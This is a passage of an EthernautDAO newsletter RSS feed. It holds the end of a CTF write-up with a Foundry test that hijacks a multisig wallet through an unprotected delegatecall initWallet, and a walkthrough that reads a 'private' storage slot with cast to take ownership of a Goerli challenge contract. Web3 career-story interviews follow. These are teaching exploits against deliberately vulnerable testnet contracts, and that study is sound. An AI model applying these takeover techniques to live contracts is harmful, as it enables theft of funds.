        wallet <span class="hljs-operator">=</span> Wallet(<span class="hljs-keyword">payable</span>(<span class="hljs-number">0x19c80e4Ec00fAAA6Ca3B41B17B75f7b0F4D64CB7</span>));
        walletLibrary <span class="hljs-operator">=</span> WalletLibrary(<span class="hljs-keyword">payable</span>(<span class="hljs-number">0x43FF315d0003365fe1246344115A3142b9EBfe0b</span>));        vm.label(<span class="hljs-keyword">address</span>(wallet), <span class="hljs-string">"Wallet"</span>);
        vm.label(<span class="hljs-keyword">address</span>(walletLibrary), <span class="hljs-string">"WalletLibrary"</span>);        <span class="hljs-comment">// We are funding the Wallet contract with 1 wei just to test the transaction that will allow us to withdraw from it!</span>
        vm.deal(<span class="hljs-keyword">address</span>(wallet), <span class="hljs-number">1</span>);
    }    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">testTakeOwnership</span>(<span class="hljs-params"></span>) <span class="hljs-title"><span class="hljs-keyword">public</span></span> </span>{
        <span class="hljs-keyword">address</span> player <span class="hljs-operator">=</span> users[<span class="hljs-number">0</span>];
        vm.startPrank(player);        <span class="hljs-comment">// prepare the attack</span>
        <span class="hljs-keyword">address</span>[] <span class="hljs-keyword">memory</span> owners <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> addressUnsupported embed;
        owners[<span class="hljs-number">0</span>] <span class="hljs-operator">=</span> player;        <span class="hljs-comment">// call the `wallet.fallback` function passing the correct data to make it make a</span>
        <span class="hljs-comment">// delegatecall to walletLibrary that will execute initWallet on Wallet's context</span>
        <span class="hljs-comment">// initWallet should be protected by a flag that check if the contract has been initialized or not</span>
        <span class="hljs-comment">// like require(owners.length == 0)</span>
        <span class="hljs-comment">// by doing so we have been added to the list of owners</span>
        <span class="hljs-comment">// but we can execute any transaction we want because we have lowered the amount of needed confirmation request</span>
        <span class="hljs-comment">// required to only 1</span>
        (<span class="hljs-keyword">bool</span> success, ) <span class="hljs-operator">=</span> <span class="hljs-keyword">address</span>(wallet).<span class="hljs-built_in">call</span>(<span class="hljs-built_in">abi</span>.<span class="hljs-built_in">encodeWithSignature</span>(<span class="hljs-string">"initWallet(address[],uint256)"</span>, owners, <span class="hljs-number">1</span>));        assertEq(success, <span class="hljs-literal">true</span>);
        assertEq(wallet.numConfirmationsRequired(), <span class="hljs-number">1</span>);
        assertEq(wallet.owners(<span class="hljs-number">3</span>), player);        <span class="hljs-comment">// Now I'm one of the owners and because numConfirmationsRequired = 1 I can execute tx</span>
        <span class="hljs-comment">// Let's create a transaction.</span>
        (success, ) <span class="hljs-operator">=</span> <span class="hljs-keyword">address</span>(wallet).<span class="hljs-built_in">call</span>(
            <span class="hljs-built_in">abi</span>.<span class="hljs-built_in">encodeWithSignature</span>(<span class="hljs-string">"submitTransaction(address,uint256,bytes)"</span>, player, <span class="hljs-number">1</span>, <span class="hljs-string">""</span>)
        );
        assertEq(success, <span class="hljs-literal">true</span>);        <span class="hljs-comment">// Confirm the transaction we just created</span>
        <span class="hljs-comment">// At the moment of the creation of our transaction the transaction array was empty</span>
        <span class="hljs-comment">// So our txIndex is 0</span>
        <span class="hljs-keyword">uint256</span> txIndex <span class="hljs-operator">=</span> <span class="hljs-number">0</span>;
        (success, ) <span class="hljs-operator">=</span> <span class="hljs-keyword">address</span>(wallet).<span class="hljs-built_in">call</span>(<span class="hljs-built_in">abi</span>.<span class="hljs-built_in">encodeWithSignature</span>(<span class="hljs-string">"confirmTransaction(uint256)"</span>, txIndex));
        assertEq(success, <span class="hljs-literal">true</span>);        <span class="hljs-comment">// Execute the transaction</span>
        <span class="hljs-keyword">uint256</span> playerBalanceBefore <span class="hljs-operator">=</span> player.<span class="hljs-built_in">balance</span>;
        (success, ) <span class="hljs-operator">=</span> <span class="hljs-keyword">address</span>(wallet).<span class="hljs-built_in">call</span>(<span class="hljs-built_in">abi</span>.<span class="hljs-built_in">encodeWithSignature</span>(<span class="hljs-string">"executeTransaction(uint256)"</span>, txIndex));
        assertEq(success, <span class="hljs-literal">true</span>);        <span class="hljs-comment">// Assert that we have received 1 wei from the Wallet contract</span>
        assertEq(playerBalanceBefore <span class="hljs-operator">+</span> <span class="hljs-number">1</span>, player.<span class="hljs-built_in">balance</span>);        vm.stopPrank();
    }
}
</code></pre><p>Here is the command I have used to run the test: <code>forge test --match-contract WalletTest --fork-url &lt;your_rpc_url&gt; --fork-block-number 7178864 -vv</code></p><p>Just remember to replace <code>&lt;your_rpc_url&gt;</code> with the RPC URL, you got from Alchery or Infura.</p><p>You can read the full solution to the challenge, by opening <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://github.com/StErMi/ethernautdao-ctf/blob/main/test/Wallet.t.sol">Wallet.t.sol</a></p><h2 id="h-further-reading" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Further reading</h2><ul><li><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://docs.soliditylang.org/en/latest/contracts.html#fallback-function">Solidity Docs: fallback function</a></p></li><li><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://solidity-by-example.org/fallback">solidity-by-example: fallback function</a></p></li><li><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-libraries">Solidity Docs: Delegatecall / Callcode and Libraries</a></p></li><li><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://swcregistry.io/docs/SWC-112">SWC-112: Delegatecall to Untrusted Callee</a></p></li><li><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://blog.sigmaprime.io/solidity-security.html#delegatecall">Sigma Prime, Solidity Security: Comprehensive list of known attack vectors and common anti-patterns: delegatecall</a></p></li><li><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://docs.openzeppelin.com/upgrades-plugins/1.x/proxies">OpenZeppelin Proxy</a></p></li></ul><h2 id="h-disclaimer" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Disclaimer</h2><p>All Solidity code, practices, and patterns in this repository are DAMN VULNERABLE and for educational purposes only.</p><p>I <strong>do not give any warranties</strong> and <strong>will not be liable for any loss</strong> incurred through any use of this codebase.</p><p><strong>DO NOT USE IT IN PRODUCTION</strong>.</p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/35f4f01a621ed2aaf1eeb28664fb12006ca9679f04f3b4f7487e42325245160d.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Safe space, where we can be vulnerable]]></title>
            <link>https://paragraph.com/@ethernautdao/safe-space-where-we-can-be-vulnerable</link>
            <guid>9zM799FZxyeNbGL9ugoB</guid>
            <pubDate>Tue, 12 Jul 2022 15:24:56 GMT</pubDate>
            <description><![CDATA[Safe space is a series of hackable smart contracts (CTF) where community members will dive deep into some solidity vulnerabilities.Author: Giovannidisiena.ethhttps://twitter.com/giovannidisienaAlso, follow Stermi.eth for another good explanation:https://twitter.com/StErMi Reading Private Data If you have some familiarity with Solidity smart contracts then you will have come across state variable visibility – public, internal, and private. Although it sounds counter to what you might expect, t...]]></description>
            <content:encoded><![CDATA[<h2 id="h-safe-space-is-a-series-of-hackable-smart-contracts-ctf-where-community-members-will-dive-deep-into-some-solidity-vulnerabilities" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Safe space is a series of hackable smart contracts (CTF) where community members will dive deep into some solidity vulnerabilities.</h2><h2 id="h-author-giovannidisienaeth" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Author: Giovannidisiena.eth</h2><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/giovannidisiena">https://twitter.com/giovannidisiena</a></p><h2 id="h-also-follow-stermieth-for-another-good-explanation" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Also, follow Stermi.eth for another good explanation:</h2><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/StErMi">https://twitter.com/StErMi</a></p><p>Reading Private Data</p><p>If you have some familiarity with Solidity smart contracts then you will have come across state variable visibility – public, internal, and private. Although it sounds counter to what you might expect, the key takeaway from this challenge is that anyone can read the value stored in a private variable.</p><p>Repeat after me:</p><p><code>private</code> <strong>variables aren’t private</strong></p><p>This keyword refers only to the ability of an external contract to access the variable, while to Shadowy Super Coders th</p><p>e value is accessible via inspecting the contract storage layout and reading the corresponding slot directly.</p><p>To pull off the hack we are going to be using Foundry (big up Georgios &amp; Co). If you don’t already have it installed then go ahead and run <code>curl -L https://foundry.paradigm.xyz | bash</code> before running <code>foundryup</code> in a new session. Additional documentation is available in the <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://github.com/foundry-rs/foundry">official repo</a> and <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://book.getfoundry.sh">book</a>.</p><p>We will first create a new directory and initialize a new Forge project like so:</p><pre data-type="codeBlock" text="mkdir private-data &amp;&amp; cd $_ &amp;&amp; forge init
"><code>mkdir <span class="hljs-keyword">private</span><span class="hljs-operator">-</span>data <span class="hljs-operator">&#x26;</span><span class="hljs-operator">&#x26;</span> cd $<span class="hljs-keyword">_</span> <span class="hljs-operator">&#x26;</span><span class="hljs-operator">&#x26;</span> forge init
</code></pre><p>Go ahead and copy the contract code to PrivateData.sol. We’ll need this to inspect the contract storage layout (and if you wanted to run tests against a local fork using <code>anvil</code>).</p><p>The easiest method for inspecting the storage layout really is as simple as:</p><pre data-type="codeBlock" text="forge inspect PrivateData storage —pretty
"><code>forge inspect PrivateData <span class="hljs-keyword">storage</span> —pretty
</code></pre><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/c4d5b2c35500964a63c2b329ed3457cf45a1f3f1fc6adbde79500a26eed439b0.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p>From this, we can see that the variable <code>secretKey</code> corresponds to storage slot 8.</p><p>To arrive at the same result without the power of Forge, you would need to apply <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://docs.soliditylang.org/en/v0.8.13/internals/layout_in_storage.html#layout-of-state-variables-in-storage">storage layout rules</a> manually, understanding that the EVM stores state variables in 32-byte slots and performs slot packing, such that these variables get stored in a single slot, if successive declarations sum to no more than 32 bytes:</p><ul><li><p><code>NUM</code> is inlined to contract bytecode at compile time since it is a constant variable</p></li><li><p><code>owner</code> is of address type, which is 20 bytes, and occupies storage slot 0</p></li><li><p><code>randomData</code> is a constant-size array of bytes32 and occupies 160 bytes, from storage slot 1 to slot 5</p></li><li><p><code>addressToKeys</code> mapping has an unpredictable size, so the elements it contains are stored starting at a different storage slot that is computed using a keccak hash which is stored at storage slot 6</p></li><li><p><code>a</code> and <code>b</code> are both of type uint128 which together pack to 32 bytes and as such both occupy slot 7</p></li><li><p><code>secretHash</code> therefore occupies storage slot 8</p></li></ul><p>Regardless of which method you choose, once you have the desired storage slot it is again as simple as running the following command to read the value stored:</p><pre data-type="codeBlock" text="cast storage 0x620E0c88E0f8F36bCC06736138bDEd99B6401192 8 --rpc-url https://eth-goerli.g.alchemy.com/v2/${ALCHEMY_GOERLI_ID}
"><code>cast <span class="hljs-keyword">storage</span> <span class="hljs-number">0x620E0c88E0f8F36bCC06736138bDEd99B6401192</span> <span class="hljs-number">8</span> <span class="hljs-operator">-</span><span class="hljs-operator">-</span>rpc<span class="hljs-operator">-</span>url https:<span class="hljs-comment">//eth-goerli.g.alchemy.com/v2/${ALCHEMY_GOERLI_ID}</span>
</code></pre><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/49f774723524c381b2af1f06514ae9878155643be7c294db5f5bc8e529e52542.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p>And there it is! We have the secret key.</p><p>Now to take ownership of the contract, send a transaction with:</p><pre data-type="codeBlock" text="cast send 0x620E0c88E0f8F36bCC06736138bDEd99B6401192 --rpc-url https://eth-goerli.g.alchemy.com/v2/${ALCHEMY_GOERLI_ID} --private-key ${PRIVATE_KEY} &quot;takeOwnership(uint256)()&quot; 0x43223b17c0688af05eea8efbd2b6c424174874f5945a09fce2e3fa1afb6984b7
"><code>cast <span class="hljs-keyword">send</span> <span class="hljs-number">0x620E0c88E0f8F36bCC06736138bDEd99B6401192</span> --rpc-url https:<span class="hljs-regexp">//</span>eth-goerli.g.alchemy.com/v2/${ALCHEMY_GOERLI_ID} --private-key ${PRIVATE_KEY} <span class="hljs-string">"takeOwnership(uint256)()"</span> <span class="hljs-number">0x43223b17c0688af05eea8efbd2b6c424174874f5945a09fce2e3fa1afb6984b7</span>
</code></pre><p>And view the current owner with:</p><pre data-type="codeBlock" text="cast call 0x620E0c88E0f8F36bCC06736138bDEd99B6401192 --rpc-url https://eth-goerli.g.alchemy.com/v2/${ALCHEMY_GOERLI_ID} &quot;owner()(address)”
"><code>cast call <span class="hljs-number">0</span>x620E0c88E0f8F36bCC06736138bDEd99B6401192 <span class="hljs-attr">--rpc-url</span> https://eth-goerli.g.alchemy.com/v2/${ALCHEMY_GOERLI_ID} "<span class="hljs-built_in">owner</span>()(address)”
</code></pre><p>Of course, you could also use our newfound superpower and read the storage slot 0 directly.</p><p>As a quick aside, it is important to note that you should not rely on block data for randomness, as explained <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://betterprogramming.pub/how-to-generate-truly-random-numbers-in-solidity-and-blockchain-9ced6472dbdf">here</a> and <code>rndString</code> is visible on Etherscan as a decoded constructor argument.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/de92cf98f67daf8150a7d716c184cf577bc8d91508c0c06b8d68ae5d79dac06e.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p>A slightly improved solution could be storing the keccak hash of the secret key in a commit-reveal type fashion, so as not to expose the key itself, and validating input against this; however, it is still of course flawed in that the correct key will become visible to everyone once someone crafts a successful transaction.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/590c3f1af9180f8de754ef55192175fef86e66cdcac96a0e9dc3ec7a1e0cc438.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p>I hope that was helpful – happy hacking!</p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/3107d4115672ac2b4aeec9ca2882ac546f26c4c336c711c96285fd95f52e192b.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Ethernaut Wei series presents: wasp]]></title>
            <link>https://paragraph.com/@ethernautdao/ethernaut-wei-series-presents-wasp</link>
            <guid>cymA674Nlh7gwbV7XoAt</guid>
            <pubDate>Thu, 07 Jul 2022 14:32:35 GMT</pubDate>
            <description><![CDATA[A place where developers tell their stories of how they became part of web3.Donate and get one of these NTFs here!What did you do before getting into web3?Starting in college, my goal was to become a doctor. I spent almost my entire undergrad preparing for medical school until my senior year when I decided on a whim to take an Intro to Java course that forced me to revaluate many decisions concerning my career and life aspirations.I decided to pick up a second major in Computer Science and I ...]]></description>
            <content:encoded><![CDATA[<h2 id="h-a-place-where-developers-tell-their-stories-of-how-they-became-part-of-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">A place where developers tell their stories of how they became part of web3.</h2><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/e9f15d6baba9802b6f20a85e6f4bcd960d62dab3f7a65d960c8fe688427e1b37.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p>Donate and get one of these NTFs <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="http://ethernautdao.io/">here</a>!</p><h2 id="h-what-did-you-do-before-getting-into-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What did you do before getting into web3?</h2><p>Starting in college, my goal was to become a doctor. I spent almost my entire undergrad preparing for medical school until my senior year when I decided on a whim to take an Intro to Java course that forced me to revaluate many decisions concerning my career and life aspirations.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/35ccf12661deab29d71f94a9b61b1128836d4181c453a40f18a9638ed8d19ca2.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p>I decided to pick up a second major in Computer Science and I ended up enjoying it enough to forget about medical school altogether. Following that decision, I landed a job as a full-stack dev at Tyler Technologies working on state and local government-related web and mobile apps. I was fortunate that my first job gave me the opportunity to work on a wide variety of projects providing plenty of experience with new languages and tech stacks that I still use today in Web3.</p><h2 id="h-what-were-the-first-things-you-did-in-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What were the first things you did in web3?</h2><p>The very first thing I did was read <strong>Bitcoin and Cryptocurrency Technologies: A Comprehensive Introduction</strong>. I was interested in investing in crypto but felt I didn&apos;t understand it enough to do so safely. I decided to read that book to understand the basics and ended up falling in love with the technology. I then spent a lot of time learning via tutorials on Udemy, CryptoZombies, and other excellent resources and once I got some confidence, a friend and I started a project which was a 1v1 gambling dApp that used Chainlink for verifiable randomness. That ended up not going anywhere, but it helped me land a few interviews for Web3 positions, including one at Kwenta. The project also helped my friend get his first job as a full-stack dev in Web2, so <strong>I consider that project successful despite it never being used</strong>.</p><h2 id="h-when-and-how-did-you-start-to-think-about-quitting-your-web2-job" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">When and how did you start to think about quitting your web2 job?</h2><p>One day after work, I was having a conversation with my partner about our future plans and I realized that my then-current job would not be supportive of the life we wanted. I knew that entering the job market would be tough. I didn&apos;t want to end up somewhere that I hated, so I made a list of things that I was passionate about that I could prioritize when applying to companies. I have always enjoyed learning about finance and began investing on Etrade when I was in the seventh grade with the money I&apos;d made from cutting grass and walking dogs. I&apos;m also an engineer and deeply enjoy the process of building software. Doing something in the future that would allow me to combine both of those passions was my ultimate goal and that is when I realized Web3 (specifically DeFi) would be the perfect place for me.</p><h2 id="h-how-did-you-hear-about-ethernautdao" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did you hear about EthernautDAO?</h2><p>I first heard about the EthernautDAO on Twitter. I didn&apos;t dig too deeply into it at the time, but much later a friend reached out to me. He explained about these mentorships and that I should apply to be a mentee. I learned that it would be paid and that the mentorship often led to full-time job offers, so it was a perfect opportunity.</p><h2 id="h-have-you-applied-for-a-mentorship" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Have you applied for a mentorship?</h2><p>Yes! I was chosen by <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/_jchiaramonte">@_jchiaramonte</a> to be his mentee.</p><h2 id="h-how-did-it-feel-did-you-work-and-get-mentored-at-the-same-time" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did it feel? Did you work and get mentored at the same time?</h2><p>It felt amazing. I had been working hard for a long time trying to break into web3 and I knew the mentorship was going to be the final key to getting in full-time. It was difficult because I was still working during my mentorship, but spending my weeknights and weekends working was well worth it.</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/1be7a296717cb8a45c544d0705b74cf4efadfd1b26771474cb01d3918aedf8f9.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><h2 id="h-if-you-have-transitioned-to-web3-full-time-how-different-is-it-from-your-previous-career" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">If you have transitioned to web3 full time, how different is it from your previous career?</h2><p>So far, I have worked at Crypto.com and Kwenta. The biggest difference in my experience has been responsibility. Both jobs expected much more from me in terms of leadership and code quality. The nature of Web3 is unforgiving when it comes to mistakes and that translates to engineers needing to be much more disciplined and security conscious. The second biggest difference is the sense of belonging to a team/protocol/project that values and rewards the best opinions and ideas received from the community. I am currently reading <strong>Principles by Ray Dalio</strong> and his description of an &quot;<a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/raydalio/status/1066357616350253057?lang=es">Idea Meritocracy</a>&quot; is a pretty good depiction of how DAO&apos;s I have interacted with operate.</p><h2 id="h-what-advice-would-you-give-to-web3-curious-devs" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What advice would you give to web3-curious devs?</h2><p>Depending on where you are in your career, my advice differs. I think that if you are just starting to dive into software development, Web3 might be a little overwhelming. If Web3 is your end goal, skills picked up in Web2 will be valuable once you make that transition. <strong>Focusing on improving fundamentals will pay the biggest dividends</strong>. If you are a little more experienced and you are seriously considering transitioning, the best advice I can give is to <strong>consume as much Web3 content as you can</strong>. That might be youtube videos, Udemy courses, podcasts, books, etc. I am also a big fan of hackathons, but I realize they&apos;re not always the best option for everyone. Finally, I would recommend <strong>taking a deep dive into one or two protocols you enjoy</strong>. I was really interested in Uniswap and spent quite a bit of time looking at their smart contracts. Many famous authors have said one of the best ways to improve your own writing is to read more. The same goes for coding. Once you know that Web3 is for you, <strong>applying for an EthernautDAO mentorship is a fantastic choice</strong>. As I and others have proven, this can be done all while still working in Web2.</p><p>Follow Wasp on Twitter:</p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/Jared_Borders">https://twitter.com/Jared_Borders</a></p><p><em>EthernautDAO offers free mentorships to experienced web2 devs trying to break into web3. If this sounds like you, check out the available mentorships in the EthernautDAO </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://discord.gg/RQ5WYDxUF3"><em>Discord</em></a><em> and follow us on </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/EthernautDAO"><em>Twitter</em></a><em> to get notified when a new mentorship is available.</em></p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/3107d4115672ac2b4aeec9ca2882ac546f26c4c336c711c96285fd95f52e192b.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Ethernaut Wei series presents: Crisgarner (mentor)]]></title>
            <link>https://paragraph.com/@ethernautdao/ethernaut-wei-series-presents-crisgarner-mentor</link>
            <guid>OIIEpTdr0pKs8i2BU49a</guid>
            <pubDate>Wed, 25 May 2022 13:07:17 GMT</pubDate>
            <description><![CDATA[A place where developers tell their stories of how they became part of web3.This is Crisgarner&apos;s Ethernaut NFT!Donate and get one of these NTFs here!What did you do before getting into web3?I was obsessed with entrepreneurship, created many tech startups (all failed), also was organizing events for entrepreneurs, taught formally entrepreneurship in a college, and even had my own startup incubator. What were the first things you did in web3?I did a lot of simple projects to get to know we...]]></description>
            <content:encoded><![CDATA[<h2 id="h-a-place-where-developers-tell-their-stories-of-how-they-became-part-of-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">A place where developers tell their stories of how they became part of web3.</h2><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/28d3584134a129814b683b62ca4524f85c7e49a5ccd3afa60ac54abb8adaf36d.png" alt="This is Crisgarner&apos;s Ethernaut NFT!" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">This is Crisgarner&apos;s Ethernaut NFT!</figcaption></figure><p>Donate and get one of these NTFs <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="http://ethernautdao.io/">here</a>!</p><h2 id="h-what-did-you-do-before-getting-into-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What did you do before getting into web3?</h2><p>I was obsessed with entrepreneurship, created many tech startups (all failed), also was organizing events for entrepreneurs, taught formally entrepreneurship in a college, and even had my own startup incubator. </p><h2 id="h-what-were-the-first-things-you-did-in-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What were the first things you did in web3?</h2><p>I did a lot of simple projects to get to know web3 better, I participated in tons of hackathons, virtual and physical, and started my own web3 startup named affogato, doing coffee-related products with web3. I hacked some tools related to coffee farmers, like collateralized loans using coffee as collateral, a splitter contract for tipping farmers, some DAO tooling, and I think one of my last was a push notification protocol, way before EPNS existed.</p><h2 id="h-when-and-how-did-you-start-to-think-about-quitting-your-web2-job" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">When and how did you start to think about quitting your web2 job?</h2><p>I felt an immediate connection with web3, I quit my jobs and started focusing on web3 full-time, the only issue was that it was the start of the bear market, it was really hard, not because I lost money or anything, but because it was impossible to get a job or raise funds. I remember getting interviews or being ignored on email chains and it&apos;s funny because, after covid + bull, some people started pinging on those old years’ mails to see if I was still interested</p><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/5ba5e284fe9b57e8e2ba990024bf8249826026f6a6b490cc852407be3b82b453.png" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p>I managed to survive by doing contractor work, winning hackathons, and some grants from ConsenSys. In the end, was all worth it. I now work full-time for Cryptex Finance DAO.</p><h2 id="h-how-did-you-hear-about-ethernautdao" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did you hear about EthernautDAO?</h2><p>A <strong>good way to learn is to follow good developers on Twitter</strong>, by following some I found out about EthernautDAO when it was in the creation stage. A few to follow are <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/gakonst">@gakonst</a> <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/transmissions11">@transmissions11</a> <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/bantg">@bantg</a></p><h2 id="h-did-you-post-a-mentorship-how-did-it-feel" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Did you post a mentorship? How did it feel?</h2><p>I did, and it felt really good seeing so many good and talented candidates. Actually, wish to have more time to pick more candidates.</p><h2 id="h-if-you-have-transitioned-to-web3-full-time-how-different-is-it-from-your-previous-career" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">If you have transitioned to web3 full time, how different is it from your previous career?</h2><p>Really different, the community is an important part, virtual relationships are a blast, I can breathe and I don’t have to waste time on the commute. I also, travel a lot to events to compensate for the lack of physical interactions. If you want to work for a DAO you can just enter their discord and start collaboration it’s that simple.</p><h2 id="h-what-advice-would-you-give-to-web3-curious-devs" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What advice would you give to web3-curious devs?</h2><p>Give it a try, will change your life. Go to a lot of hackathons, hone your skills and learn from the bests. Of course, getting a mentor will give you an advantage as you won’t have to do it all by trial and error.</p><p>Follow Crisgarner on Twitter: <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/crisgarner">@crisgarner</a></p><p><em>EthernautDAO offers free mentorships to experienced web2 devs trying to break into web3. If this sounds like you, check out the available mentorships in the EthernautDAO </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://discord.gg/RQ5WYDxUF3"><em>Discord</em></a><em> and follow us on </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/EthernautDAO"><em>Twitter</em></a><em> to get notified when a new mentorship is available.</em></p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/3107d4115672ac2b4aeec9ca2882ac546f26c4c336c711c96285fd95f52e192b.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Ethernaut Wei series presents: Anondev]]></title>
            <link>https://paragraph.com/@ethernautdao/ethernaut-wei-series-presents-anondev</link>
            <guid>lGmk48SYSR46wmph6LyT</guid>
            <pubDate>Tue, 17 May 2022 17:48:04 GMT</pubDate>
